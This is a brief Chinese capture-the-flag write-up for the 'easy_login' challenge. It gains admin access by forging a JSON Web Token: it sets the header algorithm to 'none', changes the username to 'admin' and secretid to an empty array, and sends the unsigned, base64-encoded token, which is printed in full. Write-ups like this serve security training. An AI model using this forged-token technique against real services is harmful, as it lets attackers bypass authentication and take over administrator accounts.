!!! 看我
登录安全-伪造admin实现getflag
easy_login
输入用户名密码注册,在这个时候抓包
{"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MCwidXNlcm5hbWUiOiJhIiwicGFzc3dvcmQiOiJhIiwiaWF0IjoxNjIzNjAyMTgwfQ.VwHlxVpIwoAp8b5NrGjbN56rsZ3IDrt5N9i66aXSYTE"}
获取flag 涉及到权限/controllers/api.js
第一个值:header里改成none
{
"alg": "none",
"typ": "JWT"
}
ewogICJhbGciOiAibm9uZSIsCiAgInR5cCI6ICJKV1QiCn0=
第二个值:playload 用户名改成admin
{
“secretid”: [],
“username”: “admin”,
“password”: “a”,
“iat”: 1623602180
}
ewogICJzZWNyZXRpZCI6IFtdLAogICJ1c2VybmFtZSI6ICJhZG1pbiIsCiAgInBhc3N3b3JkIjogImEiLAogICJpYXQiOiAxNjIzNjAyMTgwCn0K
注意=去掉 第二部分后面要加.
ewogICJhbGciOiAibm9uZSIsCiAgInR5cCI6ICJKV1QiCn0.ewogICJzZWNyZXRpZCI6IFtdLAogICJ1c2VybmFtZSI6ICJhZG1pbiIsCiAgInBhc3N3b3JkIjogImEiLAogICJpYXQiOiAxNjIzNjAyMTgwCn0K.
数据包放出去
对方就以为你是admin